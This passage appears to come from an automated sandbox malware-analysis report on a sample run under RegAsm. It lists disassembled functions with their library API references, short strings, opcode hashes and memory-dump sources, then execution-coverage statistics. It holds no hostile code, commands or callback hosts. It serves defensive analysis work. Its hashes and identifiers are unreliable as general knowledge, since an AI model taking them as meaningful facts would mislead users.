                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBF01536180519FBCF222FE5EC0CA9E3F66FB593B1F004110FA5996170E6328920EB90
                                                                                                                                                                                                                                  Function 004409B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00440EC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: ac35285a3ee51353bbe7912fea6c108bc43d405fe717fe8e473807e3a14a736e
                                                                                                                                                                                                                                  • Instruction ID: cf9dc5a11ffdfd7da4e7bfe6e66161c0542199dd574abb9e9307dff3bba1edc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac35285a3ee51353bbe7912fea6c108bc43d405fe717fe8e473807e3a14a736e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCF11AB1C102189BCB19EF91DC91AEEB778BF58304F4041AEE50A67251EF346B89CF64
                                                                                                                                                                                                                                  Function 005554AA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                                                                  • API String ID: 3732870572-2137968064
                                                                                                                                                                                                                                  • Opcode ID: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
                                                                                                                                                                                                                                  • Instruction ID: b7ebbf75f4a4394fdac18510c5a2a831f8dc8d7d0a044abd742ea1c49a61dbf6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCA1D170901659AFCF24CE68C8706AE7FA2FF55326F54855BEC659B281F230D9098B50
                                                                                                                                                                                                                                  Function 00418FF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 261COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00419053
                                                                                                                                                                                                                                  • _memcpy_s.LIBCPMTD ref: 004191C9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::_memcpy_s
                                                                                                                                                                                                                                  • String ID: 0#R
                                                                                                                                                                                                                                  • API String ID: 285175975-3773201211
                                                                                                                                                                                                                                  • Opcode ID: a7ba7dc17e1c7df9c018ac6e81619c689052b6f9cb0b2e7441b104c8559e87de
                                                                                                                                                                                                                                  • Instruction ID: d050780ede4ed4fe07c9849112b8c1208e61c752c872a3d8e8aeee51617b1c59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7ba7dc17e1c7df9c018ac6e81619c689052b6f9cb0b2e7441b104c8559e87de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3C1B3B4D006189FCB04CFA8D994ADEF7B5BF88300F20829AD919AB355D734AE85CF54
                                                                                                                                                                                                                                  Function 00417CB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::clear.LIBCPMTD ref: 00417D4B
                                                                                                                                                                                                                                  • std::ios_base::clear.LIBCPMTD ref: 00417F39
                                                                                                                                                                                                                                    • Part of subcall function 00417740: std::ios_base::clear.LIBCPMTD ref: 00417871
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::ios_base::clear
                                                                                                                                                                                                                                  • String ID: c[A
                                                                                                                                                                                                                                  • API String ID: 1443086396-3980679666
                                                                                                                                                                                                                                  • Opcode ID: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
                                                                                                                                                                                                                                  • Instruction ID: 99249ab2a96b0c4a35e75ad57f5a14d0666851b6228f74897920b8a0745283d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1891D5B4E08249CFDB14CF95C495AEEFBB1BF48314F24815AD9166B391C738A982CF94
                                                                                                                                                                                                                                  Function 00549029 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Replicator::operator[].LIBCMT ref: 00549084
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 005491CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::Replicator::operator[]
                                                                                                                                                                                                                                  • String ID: ...
                                                                                                                                                                                                                                  • API String ID: 3707554701-440645147
                                                                                                                                                                                                                                  • Opcode ID: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
                                                                                                                                                                                                                                  • Instruction ID: 624507bb90be92a33eb7ffec281aefeedb90304f70ce32e58fa6186cfe226072
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA51EE709042469EDB25CFA8D88E6EFBFF4BB5A308F04846ED955A7391C7359A08CB50
                                                                                                                                                                                                                                  Function 0041A590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                  • String ID: HHA$HHA
                                                                                                                                                                                                                                  • API String ID: 2001391462-78794114
                                                                                                                                                                                                                                  • Opcode ID: e5cc35260b0a62041f7ddd6b34b4d38e3889f0153df8824573d97a5ec29306ff
                                                                                                                                                                                                                                  • Instruction ID: 347e595dd39205f2bc9de3d43aec5eb327ea2cfb6b9896bcba43d2fe8e904ad1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5cc35260b0a62041f7ddd6b34b4d38e3889f0153df8824573d97a5ec29306ff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE517CB5D02209EBDF04DF94D849AEF77B5BF44304F14842AE81597381D338EAA1CB66
                                                                                                                                                                                                                                  Function 0041FDE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::exception::exception.LIBCONCRTD ref: 0041FF7F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::exception::exception
                                                                                                                                                                                                                                  • String ID: parse error$parse_error
                                                                                                                                                                                                                                  • API String ID: 2807920213-1820534363
                                                                                                                                                                                                                                  • Opcode ID: da4b536e3c70ae7344b5a57a582ea96d1cf9bb47160310c149cb201edead3e02
                                                                                                                                                                                                                                  • Instruction ID: dbc7e88c930106883de65f009fb68dc6d8aa6a240a0e2e8309194fed98a0f7f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4b536e3c70ae7344b5a57a582ea96d1cf9bb47160310c149cb201edead3e02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F151EE75D00248AFCB04DF95D891AEEBBB5BF48304F10C19EE90A6B351DB746A85CF94
                                                                                                                                                                                                                                  Function 00548716 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00548816
                                                                                                                                                                                                                                    • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::shared_ptr
                                                                                                                                                                                                                                  • String ID: amp$cpu
                                                                                                                                                                                                                                  • API String ID: 2125921051-2542064945
                                                                                                                                                                                                                                  • Opcode ID: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
                                                                                                                                                                                                                                  • Instruction ID: 896c4ba004cd65ef6f763240b3cdf26fd80aec3528ec41c2a5a41c97531dc988
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96318E75D002199FCB08DF98D855AFEBFF4FB89308F50946AE545A7281DB309A44CF90
                                                                                                                                                                                                                                  Function 00547206 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                  • API String ID: 1333004437-3554254475
                                                                                                                                                                                                                                  • Opcode ID: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
                                                                                                                                                                                                                                  • Instruction ID: cfba32f82a06b1ae547287a4b51561787bedcfb965af2065dbc01e39e5182c2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98219D78908209AFDF04DFA4EC06AEC7FB1FB49308F148499F9459B251C7B19A85DF40
                                                                                                                                                                                                                                  Function 0040E300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040E314
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E3C1
                                                                                                                                                                                                                                    • Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540110
                                                                                                                                                                                                                                    • Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540134
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
                                                                                                                                                                                                                                  • Instruction ID: 03bdc895a0f5d6872fa9838c6808d5c4a4255a01d2d8090fabff2f5e12dd2b28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 983128B4E04209DFCB04CF98C991BAEFBB1FF48304F248199D805AB381C7749A41CBA5
                                                                                                                                                                                                                                  Function 004164F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                  • String ID: eVA$eVA
                                                                                                                                                                                                                                  • API String ID: 2001391462-2010160217
                                                                                                                                                                                                                                  • Opcode ID: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                  • Instruction ID: 9ab3e6916cf0d860965d67e495f956fdb17b34ad4b651c815909af831e30d601
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2531AA74A04208EFDB04CF98D094BEEB7B5BF48344F2481A9D8489B346D775AE85DF94
                                                                                                                                                                                                                                  Function 005459C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::Name::operator+=
                                                                                                                                                                                                                                  • String ID: void
                                                                                                                                                                                                                                  • API String ID: 2247604192-3531332078
                                                                                                                                                                                                                                  • Opcode ID: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
                                                                                                                                                                                                                                  • Instruction ID: 1f39a911ced60626433c28cc442ee7e4056fd6b043f7a312c73414e0e6e33478
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A1154B594061AABCF05EFA5D889AEEBFB8FF44308F004545E40267282EB705744CF50
                                                                                                                                                                                                                                  Function 00415540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041557C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
                                                                                                                                                                                                                                  • Instruction ID: 08a490f52de3c5040edce6788ffc0187c784e8b8f2f34fffafd03698af9bd941
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F0FFB1D00209AFCF04DFACD95599DBFB5AB42301F9041A9E405BF345DA35AF50CB95
                                                                                                                                                                                                                                  Function 004155B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004155EC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
                                                                                                                                                                                                                                  • Instruction ID: 88ab926aff57d90664ab7922b7cb5e9842be8a8fca64f07861ea22d7cb8f09c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF049B1E00108AFCB04DFACDD559AEBFB0EB81302F508199E404BB345DA35AE50CBA4
                                                                                                                                                                                                                                  Function 004157F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041582C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
                                                                                                                                                                                                                                  • Instruction ID: 23a3a7d8c62d0292b920b79e1ea0a251c9e9b4556a0ed5d76f89befb81dade5a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F04FB1E0010CEFCB04DFACD95599DBFB0AB81301F9041A9E845BB346DA359E50CB94
                                                                                                                                                                                                                                  Function 00415780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004157BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
                                                                                                                                                                                                                                  • Instruction ID: 69ef72a416037fdf3149eeaf2e42ed360d816649ee5327dd42f27257b19032d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F04FB1E00208EFCB04DFE8D95599EBFB4BB41341F208199E404BB355DA31AE50CB95
                                                                                                                                                                                                                                  Function 00549D7D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                  • String ID: LV${flat}
                                                                                                                                                                                                                                  • API String ID: 1333004437-3196673279
                                                                                                                                                                                                                                  • Opcode ID: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
                                                                                                                                                                                                                                  • Instruction ID: bd933459744bc577db08b3ea40e9fedb6cd0767b7467071f502a0e930009793d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F065B4504209EFD700DF84C857BDB3FE4BB06348F104155AA49DF242DBB0A984DB91
                                                                                                                                                                                                                                  Function 00415860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041587D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
                                                                                                                                                                                                                                  • Instruction ID: 9a51a63163f444b2d5d531d0c02e56d26d9bbaf05a32c5ba3a563b95f0821741
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE065F5904208EBCB04DF84D9518AD7BB4BB46301F504098F9046B351D6329F10D764
                                                                                                                                                                                                                                  Function 00415A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00415A43
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                  • Opcode ID: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
                                                                                                                                                                                                                                  • Instruction ID: 07d823033d411da519a8fa3d30cda9104c39d0445e64d8b7c4167539fe653b04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E01AB4D01108EBCF04EF98D9515ADBFB4EF8630AF600199D944AB341DA716E508BA5

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:30.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:21.4%
                                                                                                                                                                                                                                  Total number of Nodes:28
                                                                                                                                                                                                                                  Total number of Limit Nodes:1
